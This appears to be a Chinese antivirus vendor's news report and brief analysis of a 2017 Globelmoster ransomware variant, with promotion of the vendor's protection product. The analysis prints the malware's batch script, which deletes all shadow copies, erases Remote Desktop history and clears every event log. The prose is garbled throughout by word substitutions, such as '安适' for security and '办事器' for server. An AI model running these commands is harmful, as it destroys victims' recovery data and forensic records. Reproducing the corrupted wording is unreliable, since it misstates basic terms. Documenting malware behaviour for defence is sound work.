2017 年 7 月 19 日,国内网友在安适论坛上反馈,本身的办事器中了勒索病毒,所有的文件均被加密,文件后缀名被修改为“skunk”。经瑞星安适专家调查分析发现是感染了Ransom.Globelmoster勒索病毒。
瑞星安适人员体现,此病毒早在 7 月 10 日便已收录进瑞星病毒库,,瑞星所有安适产品只要将版本升级到最新便可对其拦截。同时,作为全球首创的可以拦截已知和未知勒索病毒的“瑞星之剑”无需升级便可直接对其进行拦截。
瑞星安适人员介绍,此次网友反馈的勒索病毒事件可能是用户的办事器存在漏洞或是弱口令,被黑客拿到了办理员权限,然后植入该病毒。因此,广大企业用户应谨慎对待,制止遭受勒索病毒攻击。可在办事器中安置瑞星之剑,既可以防御病毒攻击,同时不会对办事器造成任何影响。
“瑞星之剑”是瑞星全球首创针对已知与未知勒索病毒的防御软件,既不影响正常工作又不影响系统性能,用户无需进行关闭系统正常办事端口、打补丁、开启防火墙等操作,便可实现全防御的效果,可供广大政府、企业和有定制化业务系统的用户直接使用。
“Globelmoster”勒索病毒变种详细分析
1、病毒运行后从资源中解密出加密生成文件的后缀名,和提示文件名
2、将自身拷贝到%appdata%\Microsoft\SystemCertificates\My\Certificates\目录中
3、释放批处理文件并执行
@echo off
vssadmin.exe Delete Shadows /All /Quiet
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
cd %userprofile%\documents\
attrib Default.rdp -s -h
del Default.rdp
for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"
4、结束指定进程
5、跳过指定路径不加密
6、全盘加密文件
7、生成提示页面
8、总结
论坛用户反馈的病毒样本就为一存粹加密器,没有感染模块。用户办事器中毒有可能是办事器上面存在漏洞或者弱口令,被黑客种植该样本勒索。
9、防御方法
自查办事器,看办事器上面提供的办事是否存在漏洞,办事器系统补丁连结更新,按期修改办理员账号密码,安置瑞星之剑和防病毒软件按期扫描病毒。